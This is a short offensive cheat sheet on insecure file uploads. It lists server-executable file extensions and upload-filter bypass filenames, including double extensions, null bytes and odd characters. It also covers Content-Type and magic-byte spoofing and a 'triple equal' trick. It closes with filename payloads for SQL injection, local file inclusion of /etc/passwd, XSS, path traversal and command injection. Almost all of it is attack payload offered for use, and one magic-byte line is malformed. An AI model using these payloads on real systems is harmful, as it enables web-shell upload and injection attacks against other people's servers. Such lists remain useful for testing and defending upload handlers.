Insecure File Upload

Defaults extensions
PHP
.php
.php2
.php3
.php4
.php5
.php7
.pht
.shtml
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.inc
.htaccess
ASP
.asp
.aspx
.cer
.asa
.ashx
.asmx
.axd
.cshtm
.cshtml
.rem
.soap
JSP
.jsp
.jspx
.jsw
.jspf
.jsv
.wss
.do
.action
Perl
.pl
.pm
.cgi
.lib
Coldfusion
.cfm
.cfml
.cfc
.dbm
Flash
.swf
Erland Yaws Web Server
.yaws
Bypasses
Double extensions
file.jpg.php
file.php.jpg
file.php.blah123jpg
file.png.php
file.png.Php5
file.php%00.png
file.php%0d%0a.png
file.php%0a.png
file.php\x00.png
Null byte
file.php%00.gif
file.php\x00.gif
file.php%00.png
file.php\x00.png
file.php%00.jpg
file.php\x00.jpg
Special characters
file.php......
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.pHp5....
file.%E2%80%AEphp.jpg
Content-type Bypass
#Original name but different content-type
Content-Type: image/jpeg
Content-Type: image/gif
Content-Type: image/png
Magic bytes
#Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a
GIF: GIF8
Triple equal
/?file=shell.php    <-- Blocked
/?file===shell.php  <-- Bypassed
Filename Vulnerabilities:
#Time-Based SQLi Payloads
poc.js'(select*from(select(sleep(20)))a)+'.extension
​
#LFI Payloads
image.png../../../../../../../etc/passwd
​
#XSS Payloads
'"><img src=x onerror=alert(document.domain)>.extension
​
#File Traversal
../../../tmp/lol.png
​
#Command Injection
; sleep 10;

Last modified 1yr ago